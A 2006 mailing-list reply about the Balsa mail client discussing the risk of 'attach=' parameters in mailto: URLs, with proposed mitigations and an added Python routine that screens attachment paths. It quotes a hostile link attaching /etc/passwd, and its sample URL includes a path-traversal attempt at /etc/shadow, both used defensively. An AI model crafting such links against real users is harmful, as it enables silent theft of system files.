Re: [PATCH] Attachments in mailto: URLs
On Wed, 01 Nov 2006 08:57:42 -0500, Peter Bloomfield wrote:

> On reflection, implementing "attach=file" has some security implications.   
> Clicking "mailto:some-criminal some-offshore-address?attach=/etc/passwd"  
> on a random web page would probably be a bad idea.  

Here's a link to a related advisory for Outlook:

http://secunia.com/advisories/19819/

> Perhaps Balsa should just pop up the attach-file dialog with the target
> file pre-selected, so that the user has to verify that it's OK to send.

What if there are multiple attachments? 

I'm still not convinced that the issue is worth worrying about, but I
can think of a few other ways of mitigating the problem:

1. Only allow automatic attachment of files in ~ and /tmp.
2. Detect if Balsa is launched from a web browser (is this possible?) and
not allow any automatic attachments in that case.

Regards,

Johan
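As an added illustration of the first mitigation proposed above (it is not Balsa's code and is not part of the original thread), the following Python screens the `attach=` parameters of a mailto: URL before any file is attached. It assumes two things: that the allowed directories are the user's home and `/tmp`, as the message suggests, and that the function and variable names (`parse_mailto`, `path_is_allowed`, `screen_attachments`, `ALLOWED_ROOTS`) are my own. The sample URL in the `__main__` block is constructed. Paths are canonicalised with `os.path.realpath` so that `..` segments and symlinks inside an allowed directory cannot point back outside it, and every `attach=` value is handled, which covers the "multiple attachments" case raised above.

```python
import os
from urllib.parse import parse_qsl, unquote

# Directories from which a mailto: link may attach files without a prompt.
# (Assumption taken from the mitigation suggested in the thread.)
ALLOWED_ROOTS = (os.path.expanduser("~"), "/tmp")


def parse_mailto(url):
    """Split a mailto: URL into (recipients, [(header, value), ...]).

    Header names are lower-cased; values are percent-decoded by parse_qsl.
    """
    if not url.lower().startswith("mailto:"):
        raise ValueError("not a mailto: URL")
    rest = url[len("mailto:"):]
    to_part, _, query = rest.partition("?")
    recipients = [unquote(addr) for addr in to_part.split(",") if addr]
    headers = [(k.lower(), v) for k, v in parse_qsl(query, keep_blank_values=True)]
    return recipients, headers


def path_is_allowed(path, roots=ALLOWED_ROOTS):
    """True if the canonical form of `path` lies inside one of `roots`.

    realpath resolves '..' and symlinks, so /tmp/../etc/passwd or a symlink
    in /tmp that points at /etc/passwd both canonicalise outside /tmp.
    """
    real = os.path.realpath(path)
    for root in roots:
        root_real = os.path.realpath(root)
        try:
            if os.path.commonpath([real, root_real]) == root_real:
                return True
        except ValueError:
            # Raised when the two paths have no common prefix at all
            # (e.g. different drives on Windows); treat as not allowed.
            continue
    return False


def screen_attachments(url, roots=ALLOWED_ROOTS):
    """Return (allowed, rejected) lists of attach= values found in `url`.

    Relative paths are rejected outright: the working directory of the
    process that handed us the URL (a browser, for instance) is not a
    meaningful base for an attachment.
    """
    _, headers = parse_mailto(url)
    allowed, rejected = [], []
    for key, value in headers:
        if key != "attach":
            continue
        if os.path.isabs(value) and path_is_allowed(value, roots):
            allowed.append(value)
        else:
            rejected.append(value)
    return allowed, rejected


if __name__ == "__main__":
    # Constructed sample: one benign attachment, two attempts to reach /etc.
    sample = ("mailto:someone@example.org?subject=Report"
              "&attach=/tmp/report.txt"
              "&attach=/etc/passwd"
              "&attach=/tmp/../etc/shadow")
    ok, bad = screen_attachments(sample)
    print("attach without prompting:", ok)
    print("reject or ask the user:  ", bad)
```

Anything that lands in the `rejected` list is exactly what the pre-selected attach-file dialog in the earlier message is for: the path is shown to the user instead of being attached silently. Note that with `/tmp` among the roots, `realpath` may resolve it to `/private/tmp` on macOS; the comparison still works because both sides are canonicalised.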